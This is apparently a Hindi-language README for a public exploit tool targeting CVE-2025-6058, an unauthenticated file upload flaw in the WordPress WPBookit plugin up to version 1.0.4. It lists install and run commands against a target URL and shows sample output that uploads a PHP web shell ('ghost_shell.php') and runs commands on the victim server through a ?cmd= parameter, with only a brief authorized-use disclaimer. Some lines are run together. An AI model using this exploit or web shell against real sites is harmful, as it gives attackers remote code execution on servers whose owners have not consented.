
WordPress WPBookit ≤ 1.0.4 अप्रमाणित फ़ाइल अपलोड शोषण
WordPress WPBookit प्लगइन (≤ 1.0.4) को लक्षित करने वाला बिना प्रमाणीकरण का मनमाना फ़ाइल अपलोड शोषण
यह शोषण रिमोट शेल अपलोड और पूर्ण कमांड निष्पादन की अनुमति देता है।
लेखक: 0xgh057r3c0n
CVE-2025-6058 एक गंभीर भेद्यता है जो WordPress CMS पर WPBookit प्लगइन को प्रभावित करती है। एक बिना प्रमाणीकरण वाला हमलावर एक असुरक्षित AJAX एंडपॉइंट का दुरुपयोग करके मनमानी PHP फ़ाइलें अपलोड कर सकता है, जो रिमोट कोड निष्पादन (RCE) को सक्षम करता है।
README.txt के माध्यम से WordPress प्लगइन संस्करण का स्वतः पता लगाता हैghost_shell.php)python3 --version
pip install requests
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
python3 CVE-2025-6058.py -u https://victim.com
[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.
[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] Interactive GhostShell Started — type 'exit' to quit.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
ghost_shell.php/wp-content/uploads/YYYY/MM/ghost_shell.phphttps://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
यह शोषण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए विकसित किया गया है। स्पष्ट सहमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।
MIT लाइसेंस के तहत जारी
🛡️ WordPress सुरक्षा ऑडिटिंग के लिए बनाया गया 0xgh057r3c0n द्वारा